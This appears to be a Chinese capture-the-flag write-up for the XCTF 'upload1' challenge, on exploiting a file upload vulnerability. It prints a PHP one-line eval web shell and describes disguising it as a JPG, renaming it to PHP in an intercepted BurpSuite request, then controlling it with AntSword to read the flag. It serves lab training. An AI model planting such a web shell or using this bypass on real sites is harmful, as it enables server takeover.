题目

分析

根据题目可知该题考查文件上传漏洞。

用 BurpSuite 的内置浏览器打开环境。

新建记事本编写一句话木马脚本：

<?php @eval($_POST['r00ts']);?> 

保存为 jpg 格式。

打开拦截，上传脚本。拦截到数据包：

将脚本后缀名更改为 php 后放行：

打开中国蚁剑并初始化，在数据管理模块右击新建数据，根据上传成功的路径更改 url，密码为一句话木马设定的内容：

双击条目进入系统文件列表，查找 flag：

在 /var/www/html 目录下发现 flag.php：

双击条目打开文件，得到 flag：

Flag

cyberpeace{8ef7383e44cc4b892db667d6d8430377}

参考

文件上传漏洞 (上传知识点、题型总结大全-upload靶场全解)-Fasthand_-CSDN
PHP 代码审计-CTF Wiki
PHP eval() 函数-菜鸟教程
中国蚁剑(AntSword)安装、使用教程-丶没胡子的猫-CSDN

本栏目推荐文章
• NSSCTF Round#16 Basic WriteUp
• upload-labs
• el-upload只展示导入按钮
• vue3 + element-plus 的 upload + axios + django 文件上传并保存
• XCTF---MISC---心仪的公司
• 饿了么组件上传图片 element-ui upload Cannot set property ‘status‘ of null错误解决方案
• el-upload上传组件
• BUUCTF-Crypto详细Writeup
• JMU-net-security-lesson-design WriteUp
• 福建科立讯通信有限公司指挥调度管理平台-upload接口任意上传

Web_XCTF_WriteUp WriteUp upload1 upload XCTFweb_xctf_writeup writeup upload1 upload web_xctf_writeup web_xctf_writeup writeup xctf web web_xctf_writeup weak_auth writeup xctf command_execution web_xctf_writeup execution web_php_unserialize web_xctf_writeup unserialize web_xctf_writeup pure_color writeup color web_xctf_writeup simple_js writeup simple training-www-robots web_xctf_writeup training web_xctf_writeup writeup php2 xctf